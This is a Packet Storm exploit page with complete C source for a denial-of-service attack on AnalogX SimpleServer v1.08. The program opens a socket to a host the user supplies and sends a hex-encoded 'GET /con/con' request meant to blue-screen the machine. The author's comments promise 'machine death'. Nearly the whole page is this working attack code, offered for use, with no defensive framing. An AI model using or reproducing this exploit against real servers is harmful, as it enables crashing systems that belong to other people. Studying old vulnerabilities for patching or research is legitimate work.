The Analogx simpleserver v1.08 contains the time honored \con\con vulnerability.
1ca90637f564026a3e6fba6fc89c5ea16c388bebb4b02bab63aab4ca229652b6/* tested on analogx simpleserver v1.08(current stable)
/* causes blue screen of death, machine death, etc etc.
/* sad this issue wasn't addressed in current release
/* special thanks to 'kemist' for testing
/* kilrid@berZerker.net
/* www.Hack-X.org */
#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#define port 80 // change respectively
char concon[] = "\x47\x45\x54\x20"
"\x2f\x63\x6f\x6e\x2f\x63\x6f\x6e\x0a";
int sock;
struct hostent *hp;
struct sockaddr_in s;
int main( int argc, char *argv[] ) {
if(argc < 2) {
printf("analogx simpleserver v1.08 'GET /con/con' ex - kilrid@berZerker.net\n");
printf("usage: %s <host>\n",argv[0]);
exit( -1 );
}
hp=gethostbyname(argv[1]);
if (!hp) {
perror("Failed to resolve host");
exit( -1 );
}
else {
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(port);
if ((sock=socket(AF_INET,SOCK_STREAM,0))<0) perror("can't startup socket");
if (connect(sock,(struct sockaddr *)&s,sizeof(s))) perror("problem:");
usleep(100);
write(sock, concon,strlen(concon),0);
printf("attempting to crash %s via /con/con\n",argv[1]);
printf("string sent.\n");
close(sock);
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed